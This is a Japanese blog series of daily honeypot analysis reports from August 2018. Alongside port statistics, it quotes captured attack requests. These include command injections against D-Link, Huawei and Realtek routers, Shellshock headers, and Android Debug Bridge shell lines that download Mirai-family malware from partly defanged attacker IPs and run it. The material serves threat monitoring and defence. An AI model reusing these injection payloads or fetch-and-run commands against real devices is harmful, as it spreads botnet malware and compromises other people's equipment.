ハニーポット簡易分析(20日目:8/27)
8/27の分析となります。 先日、IDSである Suricataを導入しましたので、そちらの結果も記載しています(まだまだ、チューニングが必要ですが。。。)
8/27 Honeytrap分析結果
※なお、80ポートの通信は含まれていません。
検知数:7802件(データ部 0byte以上 3606件)
ポート | 件数 | 割合 | サービス | 補足 |
445 | 1,992 | 47.95% | SMB | |
220 | 292 | 7.03% | IMAP3 |
コマンド:SSH-2.0-libssh2_1.4.3 |
1433 | 68 | 1.64% | Microsoft SQL Server | |
3389 | 57 | 1.37% | RDP | |
52869 | 51 | 1.23% | D-Link, Realtek SDK | マルウェアダウンロード |
22 | 48 | 1.16% | SSH | |
35928 | 42 | 1.01% | ? | マルウェアダウンロード |
81 | 41 | 0.99% | ? | |
3390 | 39 | 0.94% | ? | |
8080 | 36 | 0.87% | PROXY |
IDSの検知
※全ポートの通信を含んでいます。
シグネチャ名 | 検知数 | 割合 |
POLICY Cleartext WordPress Login | 6,301 | 99.31% |
HTTP missing Host header | 43 | 0.68% |
SMTP no server welcome message | 1 | 0.02% |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148.72.176[.]78/ngynx && sh ngynx`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.32[.]156/bin && sh /tmp/bin`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.33[.]171/kenjiro.mips && chmod 777 /tmp/kenjiro.mips/ && /tmp/kenjiro.mips`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp; >DIR & cd /var; >DIR; rm -rf *; wget hxxp://148.72.176[.]78/ken.sh; sh ken.sh`
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・$(busybox wget -g 168.235.82[.]217 -l /tmp/xDvAq -r mpswof ;chmod +x /tmp/xDvAq ;/tmp/xDvAq h)
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・cd /tmp/;wget hxxp://80.211.47[.]28/jackmymips
・cd /tmp/;wget hxxp://159.65.232[.]56/xd.mips
・cd /tmp/;wget hxxp://107.191.99[.]41/elf.mips -O elf
・cd /tmp/;wget hxxp://142.93.1[.]75/hoho.mips -O hoho
・cd /tmp/;wget hxxp://167.99.228[.]78/ntpd.mips -O ntpd
・cd /tmp/;wget hxxp://167.99.228[.]78/8mips8.mips -O 8mips8
・cd /tmp/;wget hxxp://128.199.45[.]173/sora.mips -O sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207.148.78.[.]52/br -O- >br;sh br;busybox wget hxxp://207.148.78[.]152/r -O- >r;sh r;curl hxxp://207.148.78.152/c >c;sh c;busybox curl hxxp://207.148.78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27.102.115.[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27.102.115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
特段、傾向的に大きく変わったものはありませんでした。
IDSはデフォルトのまま導入していることもあり、チューニングしないと有効な分析は出来なさそうでした。現状は、Wordpressのログイン試行を大量に検知したことぐらいが分かるものでした。チューニングは9月ごろから本格的に実施出来ればと思っています。
以上、今回の簡易分析結果でした。
ハニーポット簡易分析(19日目:8/26)
8/26からHoneytrapのログが復活したので、Honeytrapの分析を行いたいと思います。
8/26 Honeytrap分析結果
検知数 6335件(データ部 0byte以上 3622件)
ポート | 件数 | 割合 | サービス | 補足 |
445 | 1,781 | 49.16% | SMB | |
1433 | 70 | 1.93% | Microsoft SQL Server | |
3389 | 65 | 1.79% | RDP | |
52869 | 53 | 1.46% | D-Link, Realtek SDK | マルウェアダウンロード |
8888 | 51 | 1.41% | ? | |
81 | 49 | 1.35% | ? | |
8080 | 47 | 1.30% | PROXY | |
992 | 34 | 0.94% | TELNET protocol over TLS/SSL | |
500 | 33 | 0.91% | ipsec | |
19 | 32 | 0.88% | chargen |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
POST /HNAP1/ HTTP/1.0
・wget hxxp://148[.]72[.]176[.]78/ngynx
・wget hxxp://176[.]32[.]32[.]156/bin
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget -g 31[.]220[.]43[.]190
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picdesc.xml HTTP/1.1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107.191.99.41/elf.mips
・wget hxxp://167.99.228.78/ntpd.mips
・wget hxxp://128.199.45.173/sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
今回の分析は以上となります。最近、Suricataも導入したため、その結果も近日中に報告できればと思ってます(ただし、デフォルト設定で入れたため、有効な検知が少ないですが。。。)。
ハニーポット簡易分析(18日目:8/25)
Honeytrapのログがうまく取得出来ていなかった関係で WoWHoneypotの簡易分析となります。今回もApache Struts2 の脆弱性(CVE-2018-11776)(S2-057)は来ていませんでした。。。。8/25分のWoWHoneypotの簡易分析となります。
WoWHoneypotの分析(8/25)
検知数:180件
<検知パス一覧>
URL パス | 概要 | マルウェア ダウンロード |
/ | インデックスファイルへのアクセス | × |
/12.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/56.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/9678.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/PMA/index.php | 調査行為(DB関連) | × |
/PMA2/index.php | 調査行為(DB関連) | × |
/_query.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/admin/PMA/index.php | 調査行為(DB関連) | × |
/admin/index.php | 調査行為(DB関連) | × |
/admin/mysql/index.php | 調査行為(DB関連) | × |
/admin/mysql2/index.php | 調査行為(DB関連) | × |
/admin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/admin/phpmyadmin2/index.php | 調査行為(DB関連) | × |
/admin/zkyzp.jsp | PW・ID 共にadminでのアクセス | × |
/ak.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ak47.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/angge.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/aotu.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/aw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cainiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/claroline/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/cmd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmdd.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmv.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/cmx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/conflg.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/data.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db__.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_cts.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_pma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/db_session.init.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/dbadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/defect.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/desktop.ini.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/fack.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/favicon.ico | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/feixiang.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/fileserver/sex../../..%5Cadmin/zkyzp.jsp | PUTコマンドの試行 | × |
/help.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/hh.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/hm.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/index.php | indexファイルへのアクセス | × |
/infoo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ip.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/java.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/l7.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/l8.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/lala-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/lindex.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/log.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://199[.]195[.]254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 | ○ |
/lol.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/manager/html | Tomcat管理マネージャーへのアクセス | × |
/min.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik-dpr.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstik2.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/muhstiks.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/mx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/myadmin/index.php | 調査行為(DB関連) | × |
/myadmin2/index.php | 調査行為(DB関連) | × |
/mysql-admin/index.php | 調査行為(DB関連) | × |
/mysql/index.php | 調査行為(DB関連) | × |
/mysqladmin/index.php | 調査行為(DB関連) | × |
/mz.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/pe.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/phpMyAdmin.old/index.php | 調査行為(DB関連) | × |
/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/phpMyAdmin/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/phpMyAdminold/index.php | 調査行為(DB関連) | × |
/phpMyadmin_bak/index.php | 調査行為(DB関連) | × |
/phpadmin/index.php | 調査行為(DB関連) | × |
/phpma/index.php | 調査行為(DB関連) | × |
/phpmyadmin-old/index.php | 調査行為(DB関連) | × |
/phpmyadmin0/index.php | 調査行為(DB関連) | × |
/phpmyadmin1/index.php | 調査行為(DB関連) | × |
/phpmyadmin2/index.php | 調査行為(DB関連) | × |
/phpstudy.php | 調査行為(DB関連) | × |
/pma-old/index.php | 調査行為(DB関連) | × |
/pmamy/index.php | 調査行為(DB関連) | × |
/pmamy2/index.php | 調査行為(DB関連) | × |
/pmd/index.php | 調査行為(DB関連) | × |
/q.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/qaq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/qq.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/s.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/sheep.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/ssaa.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/system.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/test.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/text.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/tools/phpMyAdmin/index.php | 調査行為(DB関連) | × |
/typo3/phpmyadmin/index.php | 調査行為(DB関連) | × |
/uploader.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/w.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wanan.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wc.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/web/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/webdav/ | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/webslee.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/weixiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wp-config.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wpo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/wuwu11.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/www/phpMyAdmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/x.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xampp/phpmyadmin/index.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xiao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xiaoma.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xshell.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xw.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xw1.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/xx.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/yao.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/yumo.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/z.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
/zuoshou.php | die(md5('PHP')) の試行もしくは該当パスへのアクセス試行 | × |
<マルウェアダウンロード>
D-Linkの脆弱性を狙った攻撃を検知していますが、おそらくMirai系だと思います。時間があるときにここらのマルウェアは分析したいですね。
・wget hxxp://176[.]32[.]32[.]156/bin
→VirusTotal
・wget hxxp://199[.]195[.]254[.]118/dlink
・wget hxxp://209[.]141[.]33[.]86/d
→VirusTotal
以上、簡易分析となります。
ハニーポット簡易分析(17日目:8/24)
本来であれば、Honeytrapの分析を行う予定でしたが、なぜかログが取得出来ていなかったため、今回はWoWHoneypotの分析を行いました。
8/24 WoWHoneypot検知数 49件
接続先 | 概要 | 攻撃 |
/ | indexファイルへのアクセス | × |
/index.php | indexファイルへのアクセス | × |
/ipc$ | 調査行為 | × |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 ※Shinka/1.0 |
○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://212[.]237[.]32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ | D-Linkの脆弱性を狙った攻撃 ※LMAO/2.0 |
○ |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
マルウェアの分析は以下となります。
ダウンロード可能
・wget hxxp://176[.]32[.]32[.]156/bin →https://www.virustotal.com/#/file/fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3/detection
ダウンロード不可
・wget hxxp://209[.]141[.]33[.]86/d
・wget hxxp://212[.]237[.]32[.]62/k
・wget hxxp://50.115.166.136/hakai.mips
今回は、Hakai 2.0 がダウンロード可能でした。Honeytrapと比較すると検知数は少ないですが、検知している通信が違うので、分析していて面白いですね。また、明日もHoneytrapのログは取れていないため、WoWHoneypotを分析する予定です。
以上、簡易分析となります。
ハニーポット簡易分析(16日目:8/23)
Apache Struts2 の脆弱性(CVE-2018-11776)(S2-057)が話題になっていますが、 23日時点ではまだ攻撃は観測できていませんでした。
早く観測できないかなーと思いつつ、8月23日分の分析を行います。
8/23 Honeytrap 分析
検知数 5583件 (データ有 3043件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,627 | 53.47% | 調査行為 |
22 | SSH | 90 | 2.96% | 調査行為 |
1433 | Microsoft SQL Server | 67 | 2.20% | 調査行為 |
3389 | RDP | 54 | 1.77% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 41 | 1.35% | /conf へのアクセス |
52869 | D-Link, Realtek SDK | 40 | 1.31% | マルウェアダウンロード |
81 | ? | 40 | 1.31% | 調査行為 |
993 | IMAPS | 38 | 1.25% | 調査行為 |
8000 | ? | 36 | 1.18% | 調査行為 |
2375 | Docker | 34 | 1.12% | 調査行為 |
マルウェアダウンロード:
ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
→
POST /HNAP1/ HTTP/1[.]0
SOAPAction: hxxp;//purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp;//176[.]32[.]32[.]156/bin && sh /tmp/bin`
ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
wget -g 209[.]141[.]33[.]86
ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp;//212[.]237[.]32[.]62/mips
・wget hxxp;//159[.]65[.]232[.]56/xd[.]mips
・wget hxxp;//167[.]99[.]14[.]199/bogan[.]mips
・wget hxxp;//107[.]191[.]99[.]41/elf[.]mips
・wget hxxp;//142[.]93[.]1[.]75/hoho[.]mips
ポート:8080
① Shell Shock の脆弱性を狙った攻撃
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0[.]sh && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/php && /usr/bin/wget -c hxxp;//185[.]14[.]30[.]79/S0[.]sh -P /tmp && /bin/sh /tmp/S0[.]sh 0<&1 2>&1
②D-Linkのルータの脆弱性を狙った攻撃
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp;//209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/[.]shinka;sh%20/tmp/[.]shinka%27$ HTTP/1[.]1
ポート 5555
①Android Debug Bridge に対する攻撃
CNXN ¼±§±host:: OPEN Ý °¯º±shell:cd /data/local/tmp;wget hxxp;//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp;//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp;//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp;//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp;//185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp;//185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:cd /data/local/tmp/; busybox wget hxxp;//27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp;//27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
今回の分析は以上となります。
ハニーポット簡易分析(14,15日目:8/21,22)
今回は二日分まとめての更新となります。
8月21日
検知数 6,679 件
<0Byte以上の宛先ポート TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,587 | 42.15% | 調査行為 |
503 | intrinsa | 254 | 6.75% | 調査行為 |
3389 | RDP | 76 | 2.02% | 調査行為 |
1433 | Microsoft SQL Server | 75 | 1.99% | 調査行為 |
52869 | D-Link, Realtek SDK | 46 | 1.22% | マルウェアダウンロード |
8080 | PROXY | 43 | 1.14% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 40 | 1.06% | /conf へのアクセス |
8089 | ? | 34 | 0.90% | 調査行為 |
4369 | ? | 33 | 0.88% | 調査行為 |
83 | MIT ML Device | 33 | 0.88% | 調査行為 |
8月22日
検知数 6,734 件
<0Byte以上の宛先ポート TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,493 | 35.31% | 調査行為 |
22 | SSH | 457 | 10.81% | 調査行為 |
1433 | Microsoft SQL Server | 99 | 2.34% | 調査行為 |
8080 | PROXY | 57 | 1.35% | 調査行為 |
3389 | RDP | 51 | 1.21% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 50 | 1.18% | /conf へのアクセス |
8081 | D-Link | 46 | 1.09% | マルウェアダウンロード |
81 | ? | 34 | 0.80% | 調査行為 |
3790 | quickbooksrds | 33 | 0.78% | 調査行為 |
21 | FTP | 32 | 0.76% | 調査行為 |
503ポートへのアクセスが増加しましたが、攻撃と思われるコードはないため、調査行為止まりの通信でした。
<マルウェアダウンロード>
①
POST /HNAP1/ HTTP/1[.]0
・wget hxxp://176[.]32[.]32[.]156/bin
・wget hxxp://50[.]115[.]166[.]136/bin
→Mirai系マルウェア
②
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
・wget -g 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi[.]sh
→Mirai系マルウェア
③
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://107[.]191[.]99[.]41/elf[.]mips
・wget hxxp://142[.]93[.]1[.]75/hoho[.]mips
・wget hxxp://209[.]97[.]143[.]112/bins/sora[.]mips
→Mirai系マルウェア
④
POST /wanipcn[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]112[.]150/mips
→Mirai系マルウェア
⑤
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1[.]1
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$ HTTP/1[.]1
→Mirai系マルウェアと推測
⑥
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
・shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs[.]
→リンク先ダウンロード不可
マルウェアの傾向も変わっておらず、基本的にはMirai系のマルウェアとなります。
以上、簡易分析となります。
ハニーポット簡易分析(13日目:8/20)
ちょっと、前の解析となりますが、8月20日の解析結果となります。今日は頑張って、昨日分まで出来ればと思っています。
マルウェアも一部ダウンロード可能なものがあったため、時間があるときにできるとことまで、解析出来ればと思っています。
Honeytrap(2018/8/20)
検知数:6750件(0byte以上 3623件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,695 | 46.78% | 調査行為 |
3389 | RDP | 465 | 12.84% | 調査行為 |
1433 | Microsoft SQL Server | 71 | 1.96% | 調査行為 |
52869 | D-Link, Realtek SDK | 61 | 1.68% | マルウェアダウンロード |
22 | SSH | 53 | 1.46% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 44 | 1.21% | /conf へのアクセス |
8087 | ? | 33 | 0.91% | 調査行為 |
5094 | ? | 32 | 0.88% | 調査行為 |
161 | SNMP | 32 | 0.88% | 調査行為 |
32764 | ? | 32 | 0.88% |
調査行為 |
宛先ポートの傾向に大きな変化はありませんでした。マルウェアダウンロードについては一部のURLが調査時点では生きている状態でした。
<マルウェアダウンロード>
ポート:52869
→Mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://142[.]93[.]1[.]75/hoho.mips
ポート:5555
→VTに登録なし
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs.
ポート:8081
→Mirai関連のマルウェア
POST /HNAP1/ HTTP/1.0
・wget hxxp://50[.]115[.]166[.]136/bin
ポート:37215
→Mirai関連のマルウェア
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi.sh
以上、簡易分析となります。